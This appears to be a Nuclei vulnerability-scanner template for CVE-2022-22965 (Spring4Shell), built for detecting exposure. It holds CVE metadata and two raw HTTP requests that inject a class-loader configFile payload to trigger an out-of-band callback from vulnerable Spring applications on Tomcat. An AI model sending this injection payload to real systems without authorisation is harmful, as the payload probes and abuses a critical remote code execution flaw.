id: CVE-2022-22965 info: name: Spring - Remote Code Execution author: justmumu,arall,dhiyaneshDK,akincibor severity: critical description: | Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit. reference: - https://tanzu.vmware.com/security/cve-2022-22965 - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/ - https://twitter.com/RandoriAttack/status/1509298490106593283 - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw - https://twitter.com/_0xf4n9x_/status/1509935429365100546 - https://nvd.nist.gov/vuln/detail/cve-2022-22965 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22965 cwe-id: CWE-94 epss-score: 0.97469 epss-percentile: 0.99956 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: vmware product: spring_framework tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev http: - raw: - | POST {{BaseURL}} HTTP/1.1 Content-Type: application/x-www-form-urlencoded class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx - | GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1 payloads: interact_protocol: - "http" - https matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" case-insensitive: true # digest: 4a0a00473045022100c4a250ca73cba54f191b018c45f2e431a4956c8fc81ed6d0a2b605fc9d0ecd8a02206cace4993d6262f1dd1b05cd7dbe883e5e3ca9969bebafdd9d26ed852ead9865:922c64590222798bb761d5b6d8e72950